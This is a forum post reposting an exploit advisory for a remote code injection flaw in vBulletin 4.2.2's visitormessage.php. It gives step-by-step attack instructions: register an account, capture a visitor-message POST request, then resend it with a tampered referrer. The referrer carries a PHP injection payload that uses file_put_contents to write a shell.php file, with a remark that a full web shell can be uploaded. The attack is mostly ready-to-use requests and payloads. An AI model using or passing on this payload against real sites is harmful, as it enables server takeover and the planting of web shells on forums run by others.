Jump to content
Sign in to follow this  
Aerosol

vBulletin 4.2.2 Remote Code Injection

Recommended Posts

#################################################################################################################
[+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
[+] Discovered By: Dariush Nasirpour (Net.Edit0r)
[+] My Homepage: black-hg.org / nasirpour.info
[+] Date: [2015 27 February]
[+] Vendor Homepage: vBulletin.com
[+] Tested on: [vBulletin 4.2.2]
[+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg )
#################################################################################################################
Remote Code Injection:
+++++++++++++++++++++++++
1) You Must Register In The vBulletin http://www.victim.com/register.php example:[blackhat]

2) go to your user profile example: [http://black-hg.org/cc/members/blackhat.html]

3) post something in visitor message and record post data with live http header

[example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time]

[Now post this with hackbar:]

URL: http://black-hg.org/cc/visitormessage.php?do=message

[Post data]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

[And referrer data:]
PoC : http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell]")}}]"

5- Open hackbar and tamper it with taper data:
referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[you can upload shell]")}}]"

and submit request.

################################################################################################################

Source

  • Upvote 1

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...